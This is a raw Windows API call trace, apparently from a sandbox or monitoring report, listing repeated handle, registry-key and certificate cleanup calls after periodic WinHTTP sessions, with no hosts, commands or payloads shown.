	[0140.742] RegCloseKey (hKey=0xa80) returned 0x0
	[0140.742] CertCloseStore (hCertStore=0x233fc682b30, dwFlags=0x0) returned 1
	[0140.742] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0140.742] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0140.743] CertFreeCertificateContext (pCertContext=0x233fc680630) returned 1
	[0140.743] FreeContextBuffer (in: pvContextBuffer=0x233e399b980 | out: pvContextBuffer=0x233e399b980) returned 0x0
	[0140.743] CertFreeCertificateContext (pCertContext=0x233fc680630) returned 1
	[0162.860] WinHttpCloseHandle (hInternet=0x233fc68bfa0) returned 1
	[0162.860] CloseHandle (hObject=0xa4c) returned 1
	[0162.860] CloseHandle (hObject=0xa50) returned 1
	[0162.860] RegCloseKey (hKey=0x9bc) returned 0x0
	[0162.861] CloseHandle (hObject=0x9c8) returned 1
	[0162.861] RegCloseKey (hKey=0x384) returned 0x0
	[0162.861] CloseHandle (hObject=0xa58) returned 1
	[0162.861] RegCloseKey (hKey=0x3c4) returned 0x0
	[0162.861] RegCloseKey (hKey=0xa80) returned 0x0
	[0162.862] CertCloseStore (hCertStore=0x233fc683350, dwFlags=0x0) returned 1
	[0162.862] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0162.862] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0162.862] CertFreeCertificateContext (pCertContext=0x233fc6804b0) returned 1
	[0162.863] FreeContextBuffer (in: pvContextBuffer=0x233e399bc80 | out: pvContextBuffer=0x233e399bc80) returned 0x0
	[0162.863] CertFreeCertificateContext (pCertContext=0x233fc6804b0) returned 1
	[0178.916] WinHttpCloseHandle (hInternet=0x233fc68aea0) returned 1
	[0178.916] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0178.916] CloseHandle (hObject=0x9bc) returned 1
	[0178.916] CloseHandle (hObject=0x9c8) returned 1
	[0178.916] RegCloseKey (hKey=0x384) returned 0x0
	[0178.917] CloseHandle (hObject=0xa58) returned 1
	[0178.917] RegCloseKey (hKey=0x3c4) returned 0x0
	[0178.917] CloseHandle (hObject=0x394) returned 1
	[0178.917] RegCloseKey (hKey=0xa64) returned 0x0
	[0178.917] RegCloseKey (hKey=0xa80) returned 0x0
	[0178.917] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0178.918] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0178.918] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0178.918] CertCloseStore (hCertStore=0x233fc683420, dwFlags=0x0) returned 1
	[0178.918] FreeContextBuffer (in: pvContextBuffer=0x233e399c8e0 | out: pvContextBuffer=0x233e399c8e0) returned 0x0
	[0191.203] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0191.203] WinHttpCloseHandle (hInternet=0x233fc689740) returned 1
	[0191.204] CloseHandle (hObject=0x9bc) returned 1
	[0191.204] CloseHandle (hObject=0x9c8) returned 1
	[0191.204] RegCloseKey (hKey=0x384) returned 0x0
	[0191.204] CloseHandle (hObject=0xa58) returned 1
	[0191.204] RegCloseKey (hKey=0x3c4) returned 0x0
	[0191.204] CloseHandle (hObject=0x394) returned 1
	[0191.205] RegCloseKey (hKey=0xa64) returned 0x0
	[0191.205] RegCloseKey (hKey=0xa80) returned 0x0
	[0191.205] CertCloseStore (hCertStore=0x233fc682580, dwFlags=0x0) returned 1
	[0191.205] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0191.205] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0191.206] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0191.206] FreeContextBuffer (in: pvContextBuffer=0x233e399cd00 | out: pvContextBuffer=0x233e399cd00) returned 0x0
	[0213.306] WinHttpCloseHandle (hInternet=0x233fc68aea0) returned 1
	[0213.306] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0213.306] CloseHandle (hObject=0x9bc) returned 1
	[0213.306] CloseHandle (hObject=0x9c8) returned 1
	[0213.307] RegCloseKey (hKey=0x384) returned 0x0
	[0213.307] CloseHandle (hObject=0xa58) returned 1
	[0213.307] RegCloseKey (hKey=0x3c4) returned 0x0
	[0213.307] CloseHandle (hObject=0x394) returned 1
	[0213.307] RegCloseKey (hKey=0xa64) returned 0x0
	[0213.307] RegCloseKey (hKey=0xa80) returned 0x0
	[0213.308] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0213.308] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0213.308] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0213.308] CertCloseStore (hCertStore=0x233fc6824b0, dwFlags=0x0) returned 1
	[0213.308] FreeContextBuffer (in: pvContextBuffer=0x233e399cd00 | out: pvContextBuffer=0x233e399cd00) returned 0x0
	[0225.388] WinHttpCloseHandle (hInternet=0x233fc689fc0) returned 1
	[0225.389] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0225.389] CloseHandle (hObject=0x9bc) returned 1
	[0225.389] CloseHandle (hObject=0x9c8) returned 1
	[0225.389] RegCloseKey (hKey=0x384) returned 0x0
	[0225.389] CloseHandle (hObject=0xa58) returned 1
	[0225.389] RegCloseKey (hKey=0x3c4) returned 0x0
	[0225.389] CloseHandle (hObject=0x394) returned 1
	[0225.389] RegCloseKey (hKey=0xa64) returned 0x0
	[0225.389] RegCloseKey (hKey=0xa80) returned 0x0
	[0225.390] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0225.390] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0225.390] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0225.391] CertCloseStore (hCertStore=0x233fc683420, dwFlags=0x0) returned 1
	[0225.391] FreeContextBuffer (in: pvContextBuffer=0x233e399c6a0 | out: pvContextBuffer=0x233e399c6a0) returned 0x0
	[0241.415] WinHttpCloseHandle (hInternet=0x233fc689da0) returned 1
	[0241.415] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0241.415] CloseHandle (hObject=0x394) returned 1
	[0241.415] CloseHandle (hObject=0xa64) returned 1
	[0241.416] RegCloseKey (hKey=0xa70) returned 0x0
	[0241.416] CloseHandle (hObject=0x270) returned 1
	[0241.416] RegCloseKey (hKey=0x25c) returned 0x0
	[0241.416] CloseHandle (hObject=0xe4) returned 1
	[0241.416] RegCloseKey (hKey=0xa5c) returned 0x0
	[0241.416] RegCloseKey (hKey=0xa80) returned 0x0
	[0241.417] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0241.417] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0241.417] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0241.417] CertCloseStore (hCertStore=0x233fc683760, dwFlags=0x0) returned 1
	[0241.418] FreeContextBuffer (in: pvContextBuffer=0x233e399b980 | out: pvContextBuffer=0x233e399b980) returned 0x0
	[0260.348] WinHttpCloseHandle (hInternet=0x233fc68bb60) returned 1
	[0260.348] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0260.348] CloseHandle (hObject=0x394) returned 1
	[0260.348] CloseHandle (hObject=0xa64) returned 1
	[0260.348] RegCloseKey (hKey=0xa70) returned 0x0
	[0260.348] CloseHandle (hObject=0x270) returned 1
	[0260.348] RegCloseKey (hKey=0x25c) returned 0x0
	[0260.349] CloseHandle (hObject=0xe4) returned 1
	[0260.349] RegCloseKey (hKey=0xa5c) returned 0x0
	[0260.349] RegCloseKey (hKey=0xa80) returned 0x0
	[0260.349] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0260.349] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0260.350] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0260.350] CertCloseStore (hCertStore=0x233fc6820a0, dwFlags=0x0) returned 1
	[0260.350] FreeContextBuffer (in: pvContextBuffer=0x233e399b620 | out: pvContextBuffer=0x233e399b620) returned 0x0
	[0280.274] WinHttpCloseHandle (hInternet=0x233fc68aea0) returned 1
	[0280.274] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0280.274] CloseHandle (hObject=0x394) returned 1
	[0280.275] CloseHandle (hObject=0xa64) returned 1
	[0280.275] RegCloseKey (hKey=0xa70) returned 0x0
	[0280.275] CloseHandle (hObject=0x270) returned 1
	[0280.275] RegCloseKey (hKey=0x25c) returned 0x0
	[0280.275] CloseHandle (hObject=0xe4) returned 1
	[0280.275] RegCloseKey (hKey=0xa5c) returned 0x0
	[0280.275] RegCloseKey (hKey=0xa80) returned 0x0
	[0280.276] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0280.276] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0280.276] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0280.276] CertCloseStore (hCertStore=0x233fc683690, dwFlags=0x0) returned 1
	[0280.277] FreeContextBuffer (in: pvContextBuffer=0x233e399bb00 | out: pvContextBuffer=0x233e399bb00) returned 0x0
	[0294.357] WinHttpCloseHandle (hInternet=0x233fc68c3e0) returned 1
	[0294.357] CertFreeCertificateContext (pCertContext=0x233fc680330) returned 1
	[0294.357] CloseHandle (hObject=0x394) returned 1
	[0294.357] CloseHandle (hObject=0xa64) returned 1
	[0294.358] RegCloseKey (hKey=0xa70) returned 0x0
	[0294.358] CloseHandle (hObject=0x270) returned 1
	[0294.358] RegCloseKey (hKey=0x25c) returned 0x0
	[0294.358] CloseHandle (hObject=0xe4) returned 1
	[0294.358] RegCloseKey (hKey=0xa5c) returned 0x0
	[0294.358] RegCloseKey (hKey=0xa80) returned 0x0
	[0294.359] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0294.359] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0294.359] CertFreeCertificateContext (pCertContext=0x233fc680330) returned 1
	[0294.359] CertCloseStore (hCertStore=0x233fc6824b0, dwFlags=0x0) returned 1
	[0294.360] FreeContextBuffer (in: pvContextBuffer=0x233e399b800 | out: pvContextBuffer=0x233e399b800) returned 0x0
	[0304.635] WinHttpCloseHandle (hInternet=0x233fc68b720) returned 1
	[0304.635] CertFreeCertificateContext (pCertContext=0x233fc680130) returned 1
	[0304.636] CloseHandle (hObject=0x394) returned 1
	[0304.636] CloseHandle (hObject=0xa64) returned 1
	[0304.636] RegCloseKey (hKey=0xa70) returned 0x0
	[0304.636] CloseHandle (hObject=0x270) returned 1
	[0304.636] RegCloseKey (hKey=0x25c) returned 0x0
	[0304.636] CloseHandle (hObject=0xe4) returned 1
	[0304.637] RegCloseKey (hKey=0xa5c) returned 0x0
	[0304.637] RegCloseKey (hKey=0xa80) returned 0x0
	[0304.637] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0304.638] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0304.638] CertFreeCertificateContext (pCertContext=0x233fc680130) returned 1
	[0304.638] CertCloseStore (hCertStore=0x233fc682240, dwFlags=0x0) returned 1
	[0304.638] FreeContextBuffer (in: pvContextBuffer=0x233e399c280 | out: pvContextBuffer=0x233e399c280) returned 0x0
	[0312.750] CertFreeCertificateContext (pCertContext=0x233fc6804b0) returned 1
	[0312.750] WinHttpCloseHandle (hInternet=0x233fc689740) returned 1
	[0312.750] CloseHandle (hObject=0x394) returned 1
	[0312.751] CloseHandle (hObject=0xa64) returned 1
	[0312.751] RegCloseKey (hKey=0xa70) returned 0x0
	[0312.751] CloseHandle (hObject=0x270) returned 1
	[0312.751] RegCloseKey (hKey=0x25c) returned 0x0
	[0312.751] CloseHandle (hObject=0xe4) returned 1
	[0312.751] RegCloseKey (hKey=0xa5c) returned 0x0
	[0312.752] RegCloseKey (hKey=0xa80) returned 0x0
	[0312.752] CertCloseStore (hCertStore=0x233fc682310, dwFlags=0x0) returned 1
	[0312.752] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0312.752] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0312.753] CertFreeCertificateContext (pCertContext=0x233fc6804b0) returned 1
	[0312.753] FreeContextBuffer (in: pvContextBuffer=0x233e399bec0 | out: pvContextBuffer=0x233e399bec0) returned 0x0
	[0328.750] WinHttpCloseHandle (hInternet=0x233fc689740) returned 1
	[0328.750] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0328.750] CloseHandle (hObject=0x394) returned 1
	[0328.751] CloseHandle (hObject=0xa64) returned 1
	[0328.751] RegCloseKey (hKey=0xa70) returned 0x0
	[0328.751] CloseHandle (hObject=0x270) returned 1
	[0328.751] RegCloseKey (hKey=0x25c) returned 0x0
	[0328.751] CloseHandle (hObject=0xe4) returned 1
	[0328.751] RegCloseKey (hKey=0xa5c) returned 0x0
	[0328.751] RegCloseKey (hKey=0xa80) returned 0x0
	[0328.753] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0328.753] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0328.753] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0328.753] CertCloseStore (hCertStore=0x233fc682e70, dwFlags=0x0) returned 1
	[0328.753] FreeContextBuffer (in: pvContextBuffer=0x233e399cd00 | out: pvContextBuffer=0x233e399cd00) returned 0x0
	[0332.527] RegCloseKey (hKey=0xa70) returned 0x0
	[0332.527] CloseHandle (hObject=0x270) returned 1
	[0332.527] RegCloseKey (hKey=0x25c) returned 0x0
	[0332.527] CloseHandle (hObject=0xe4) returned 1
	[0332.528] RegCloseKey (hKey=0xa5c) returned 0x0
	[0332.528] RegCloseKey (hKey=0xa80) returned 0x0
	[0332.528] WinHttpCloseHandle (hInternet=0x233fc689960) returned 1
	[0332.528] CloseHandle (hObject=0xa64) returned 1
	[0332.528] CloseHandle (hObject=0x394) returned 1
	[0355.667] WinHttpCloseHandle (hInternet=0x233fc688ec0) returned 1
	[0355.667] CertFreeCertificateContext (pCertContext=0x233fc680530) returned 1
	[0355.668] CloseHandle (hObject=0x25c) returned 1
	[0355.668] CloseHandle (hObject=0xe4) returned 1
	[0355.668] RegCloseKey (hKey=0xa5c) returned 0x0
	[0355.668] CloseHandle (hObject=0xa80) returned 1
	[0355.668] RegCloseKey (hKey=0x3c4) returned 0x0
	[0355.668] CloseHandle (hObject=0xa64) returned 1
	[0355.668] RegCloseKey (hKey=0x164) returned 0x0
	[0355.668] RegCloseKey (hKey=0x394) returned 0x0
	[0355.669] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0355.669] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0355.669] CertFreeCertificateContext (pCertContext=0x233fc680530) returned 1
	[0355.670] CertCloseStore (hCertStore=0x233fc682cd0, dwFlags=0x0) returned 1
	[0355.670] FreeContextBuffer (in: pvContextBuffer=0x233e399bfe0 | out: pvContextBuffer=0x233e399bfe0) returned 0x0
	[0360.262] RegCloseKey (hKey=0xa5c) returned 0x0
	[0360.262] CloseHandle (hObject=0xa80) returned 1
	[0360.262] RegCloseKey (hKey=0x3c4) returned 0x0
	[0360.262] CloseHandle (hObject=0xa64) returned 1
	[0360.262] RegCloseKey (hKey=0x164) returned 0x0
	[0360.262] RegCloseKey (hKey=0x394) returned 0x0
	[0360.263] WinHttpCloseHandle (hInternet=0x233fc68b720) returned 1
	[0360.263] CloseHandle (hObject=0xe4) returned 1
	[0360.263] CloseHandle (hObject=0x25c) returned 1
	[0375.578] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0375.578] WinHttpCloseHandle (hInternet=0x233fc68b720) returned 1
	[0375.578] CloseHandle (hObject=0xa80) returned 1
	[0375.578] CloseHandle (hObject=0x3c4) returned 1
	[0375.579] RegCloseKey (hKey=0xa64) returned 0x0
	[0375.579] CloseHandle (hObject=0x164) returned 1
	[0375.579] RegCloseKey (hKey=0x394) returned 0x0
	[0375.579] CloseHandle (hObject=0x270) returned 1
	[0375.579] RegCloseKey (hKey=0xe4) returned 0x0
	[0375.579] RegCloseKey (hKey=0x25c) returned 0x0
	[0375.579] CertCloseStore (hCertStore=0x233fc683760, dwFlags=0x0) returned 1
	[0375.580] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0375.580] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0375.580] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0375.581] FreeContextBuffer (in: pvContextBuffer=0x233e399c760 | out: pvContextBuffer=0x233e399c760) returned 0x0
	[0397.585] WinHttpCloseHandle (hInternet=0x233fc688a80) returned 1
	[0397.585] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0397.585] CloseHandle (hObject=0xa80) returned 1
	[0397.585] CloseHandle (hObject=0x3c4) returned 1
	[0397.585] RegCloseKey (hKey=0xa64) returned 0x0
	[0397.586] CloseHandle (hObject=0x164) returned 1
	[0397.586] RegCloseKey (hKey=0x394) returned 0x0
	[0397.586] CloseHandle (hObject=0x270) returned 1
	[0397.586] RegCloseKey (hKey=0xe4) returned 0x0
	[0397.586] RegCloseKey (hKey=0x25c) returned 0x0
	[0397.586] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0397.587] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0397.587] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0397.587] CertCloseStore (hCertStore=0x233fc681af0, dwFlags=0x0) returned 1
	[0397.587] FreeContextBuffer (in: pvContextBuffer=0x233e399bf80 | out: pvContextBuffer=0x233e399bf80) returned 0x0
	[0404.504] WinHttpCloseHandle (hInternet=0x233fc68aea0) returned 1
	[0404.504] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0404.504] CloseHandle (hObject=0xa80) returned 1
	[0404.505] CloseHandle (hObject=0x3c4) returned 1
	[0404.505] RegCloseKey (hKey=0xa64) returned 0x0
	[0404.505] CloseHandle (hObject=0x164) returned 1
	[0404.505] RegCloseKey (hKey=0x394) returned 0x0
	[0404.505] CloseHandle (hObject=0x270) returned 1
	[0404.505] RegCloseKey (hKey=0xe4) returned 0x0
	[0404.505] RegCloseKey (hKey=0x25c) returned 0x0
	[0404.506] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0404.506] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0404.506] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0404.506] CertCloseStore (hCertStore=0x233fc6831b0, dwFlags=0x0) returned 1
	[0404.506] FreeContextBuffer (in: pvContextBuffer=0x233e399bda0 | out: pvContextBuffer=0x233e399bda0) returned 0x0
	[0420.354] WinHttpCloseHandle (hInternet=0x233fc68b720) returned 1
	[0420.354] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0420.354] CloseHandle (hObject=0xa5c) returned 1
	[0420.355] CloseHandle (hObject=0xa80) returned 1
	[0420.355] RegCloseKey (hKey=0x3c4) returned 0x0
	[0420.355] CloseHandle (hObject=0xa64) returned 1
	[0420.355] RegCloseKey (hKey=0x164) returned 0x0
	[0420.355] CloseHandle (hObject=0x394) returned 1
	[0420.355] RegCloseKey (hKey=0x270) returned 0x0
	[0420.355] RegCloseKey (hKey=0x25c) returned 0x0
	[0420.356] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0420.356] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0420.356] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0420.356] CertCloseStore (hCertStore=0x233fc6827f0, dwFlags=0x0) returned 1
	[0420.356] FreeContextBuffer (in: pvContextBuffer=0x233e399c280 | out: pvContextBuffer=0x233e399c280) returned 0x0
	[0433.630] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0433.630] WinHttpCloseHandle (hInternet=0x233fc68b720) returned 1
	[0433.631] CloseHandle (hObject=0xa5c) returned 1
	[0433.631] CloseHandle (hObject=0xa80) returned 1
	[0433.631] RegCloseKey (hKey=0x3c4) returned 0x0
	[0433.631] CloseHandle (hObject=0xa64) returned 1
	[0433.631] RegCloseKey (hKey=0x164) returned 0x0
	[0433.631] CloseHandle (hObject=0x394) returned 1
	[0433.631] RegCloseKey (hKey=0x270) returned 0x0
	[0433.631] RegCloseKey (hKey=0x25c) returned 0x0
	[0433.632] CertCloseStore (hCertStore=0x233fc681e30, dwFlags=0x0) returned 1
	[0433.632] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0433.632] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0433.632] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0433.633] FreeContextBuffer (in: pvContextBuffer=0x233e399bb00 | out: pvContextBuffer=0x233e399bb00) returned 0x0
	[0456.787] WinHttpCloseHandle (hInternet=0x233fc68bfa0) returned 1
	[0456.787] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0456.787] CloseHandle (hObject=0xa58) returned 1
	[0456.787] CloseHandle (hObject=0xa70) returned 1
	[0456.788] RegCloseKey (hKey=0xa5c) returned 0x0
	[0456.788] CloseHandle (hObject=0xa80) returned 1
	[0456.788] RegCloseKey (hKey=0x3c4) returned 0x0
	[0456.788] CloseHandle (hObject=0xa64) returned 1
	[0456.788] RegCloseKey (hKey=0x164) returned 0x0
	[0456.789] RegCloseKey (hKey=0x25c) returned 0x0
	[0456.790] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0456.790] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0456.790] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0456.790] CertCloseStore (hCertStore=0x233fc681e30, dwFlags=0x0) returned 1
	[0456.791] FreeContextBuffer (in: pvContextBuffer=0x233e399c340 | out: pvContextBuffer=0x233e399c340) returned 0x0
	[0469.092] WinHttpCloseHandle (hInternet=0x233fc68bd80) returned 1
	[0469.092] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0469.092] CloseHandle (hObject=0xa58) returned 1
	[0469.092] CloseHandle (hObject=0xa70) returned 1
	[0469.093] RegCloseKey (hKey=0xa5c) returned 0x0
	[0469.093] CloseHandle (hObject=0xa80) returned 1
	[0469.093] RegCloseKey (hKey=0x3c4) returned 0x0
	[0469.093] CloseHandle (hObject=0xa64) returned 1
	[0469.093] RegCloseKey (hKey=0x164) returned 0x0
	[0469.093] RegCloseKey (hKey=0x25c) returned 0x0
	[0469.094] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0469.094] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0469.094] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0469.095] CertCloseStore (hCertStore=0x233fc6831b0, dwFlags=0x0) returned 1
	[0469.095] FreeContextBuffer (in: pvContextBuffer=0x233e399bc20 | out: pvContextBuffer=0x233e399bc20) returned 0x0
	[0491.054] WinHttpCloseHandle (hInternet=0x233fc68b720) returned 1
	[0491.054] CertFreeCertificateContext (pCertContext=0x233fc680330) returned 1
	[0491.054] CloseHandle (hObject=0xa70) returned 1
	[0491.054] CloseHandle (hObject=0xa5c) returned 1
	[0491.054] RegCloseKey (hKey=0xa80) returned 0x0
	[0491.054] CloseHandle (hObject=0x3c4) returned 1
	[0491.055] RegCloseKey (hKey=0xa64) returned 0x0
	[0491.055] CloseHandle (hObject=0x164) returned 1
	[0491.055] RegCloseKey (hKey=0x9c8) returned 0x0
	[0491.055] RegCloseKey (hKey=0x25c) returned 0x0
	[0491.055] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0491.056] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0491.056] CertFreeCertificateContext (pCertContext=0x233fc680330) returned 1
	[0491.056] CertCloseStore (hCertStore=0x233fc683420, dwFlags=0x0) returned 1
	[0491.056] FreeContextBuffer (in: pvContextBuffer=0x233e399bb00 | out: pvContextBuffer=0x233e399bb00) returned 0x0
	[0501.072] WinHttpCloseHandle (hInternet=0x233fc68c3e0) returned 1
	[0501.072] CertFreeCertificateContext (pCertContext=0x233fc6804b0) returned 1
	[0501.072] CloseHandle (hObject=0xa70) returned 1
	[0501.073] CloseHandle (hObject=0xa5c) returned 1
	[0501.074] RegCloseKey (hKey=0xa80) returned 0x0
	[0501.074] CloseHandle (hObject=0x3c4) returned 1
	[0501.074] RegCloseKey (hKey=0xa64) returned 0x0
	[0501.074] CloseHandle (hObject=0x164) returned 1
	[0501.074] RegCloseKey (hKey=0x9c8) returned 0x0
	[0501.075] RegCloseKey (hKey=0x25c) returned 0x0
	[0501.075] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0501.075] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0501.075] CertFreeCertificateContext (pCertContext=0x233fc6804b0) returned 1
	[0501.076] CertCloseStore (hCertStore=0x233fc682170, dwFlags=0x0) returned 1
	[0501.076] FreeContextBuffer (in: pvContextBuffer=0x233e399c280 | out: pvContextBuffer=0x233e399c280) returned 0x0
	[0522.146] WinHttpCloseHandle (hInternet=0x233fc688ec0) returned 1
	[0522.147] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0522.147] CloseHandle (hObject=0xa70) returned 1
	[0522.147] CloseHandle (hObject=0xa5c) returned 1
	[0522.147] RegCloseKey (hKey=0xa80) returned 0x0
	[0522.147] CloseHandle (hObject=0x3c4) returned 1
	[0522.147] RegCloseKey (hKey=0xa64) returned 0x0
	[0522.147] CloseHandle (hObject=0x164) returned 1
	[0522.147] RegCloseKey (hKey=0x9c8) returned 0x0
	[0522.147] RegCloseKey (hKey=0x25c) returned 0x0
	[0522.148] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0522.148] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0522.148] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
	[0522.148] CertCloseStore (hCertStore=0x233fc6824b0, dwFlags=0x0) returned 1
	[0522.149] FreeContextBuffer (in: pvContextBuffer=0x233e399be00 | out: pvContextBuffer=0x233e399be00) returned 0x0
	[0528.260] WinHttpCloseHandle (hInternet=0x233fc689da0) returned 1
	[0528.260] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0528.261] CloseHandle (hObject=0xa70) returned 1
	[0528.261] CloseHandle (hObject=0xa5c) returned 1
	[0528.261] RegCloseKey (hKey=0xa80) returned 0x0
	[0528.261] CloseHandle (hObject=0x3c4) returned 1
	[0528.262] RegCloseKey (hKey=0xa64) returned 0x0
	[0528.262] CloseHandle (hObject=0x164) returned 1
	[0528.262] RegCloseKey (hKey=0x9c8) returned 0x0
	[0528.262] RegCloseKey (hKey=0x25c) returned 0x0
	[0528.263] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0528.263] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0528.263] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0528.263] CertCloseStore (hCertStore=0x233fc683280, dwFlags=0x0) returned 1
	[0528.264] FreeContextBuffer (in: pvContextBuffer=0x233e399c640 | out: pvContextBuffer=0x233e399c640) returned 0x0
	[0547.459] WinHttpCloseHandle (hInternet=0x233fc689520) returned 1
	[0547.459] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0547.459] CloseHandle (hObject=0xa70) returned 1
	[0547.459] CloseHandle (hObject=0xa5c) returned 1
	[0547.459] RegCloseKey (hKey=0xa80) returned 0x0
	[0547.460] CloseHandle (hObject=0x3c4) returned 1
	[0547.460] RegCloseKey (hKey=0xa64) returned 0x0
	[0547.460] CloseHandle (hObject=0x164) returned 1
	[0547.460] RegCloseKey (hKey=0x9c8) returned 0x0
	[0547.460] RegCloseKey (hKey=0x25c) returned 0x0
	[0547.460] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0547.461] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0547.461] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0547.461] CertCloseStore (hCertStore=0x233fc6834f0, dwFlags=0x0) returned 1
	[0547.461] FreeContextBuffer (in: pvContextBuffer=0x233e399b560 | out: pvContextBuffer=0x233e399b560) returned 0x0
	[0568.683] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0568.683] WinHttpCloseHandle (hInternet=0x233fc68bb60) returned 1
	[0568.683] CloseHandle (hObject=0xa70) returned 1
	[0568.683] CloseHandle (hObject=0xa5c) returned 1
	[0568.684] RegCloseKey (hKey=0xa80) returned 0x0
	[0568.684] CloseHandle (hObject=0x3c4) returned 1
	[0568.684] RegCloseKey (hKey=0xa64) returned 0x0
	[0568.684] CloseHandle (hObject=0x164) returned 1
	[0568.684] RegCloseKey (hKey=0x9c8) returned 0x0
	[0568.684] RegCloseKey (hKey=0x25c) returned 0x0
	[0568.685] CertCloseStore (hCertStore=0x233fc683010, dwFlags=0x0) returned 1
	[0568.685] CertFreeCertificateContext (pCertContext=0x233fc680030) returned 1
	[0568.685] CertFreeCertificateContext (pCertContext=0x233fc67ff30) returned 1
	[0568.685] CertFreeCertificateContext (pCertContext=0x233fc67feb0) returned 1
	[0568.685] FreeContextBuffer (in: pvContextBuffer=0x233e399b620 | out: pvContextBuffer=0x233e399b620) returned 0x0
	[0576.062] WinHttpCloseHandle (hInternet=0x233fc689740) returned 1
	[0576.063] CertFreeCertificateContext (pCertContext=0x233fc67f430) returned 1
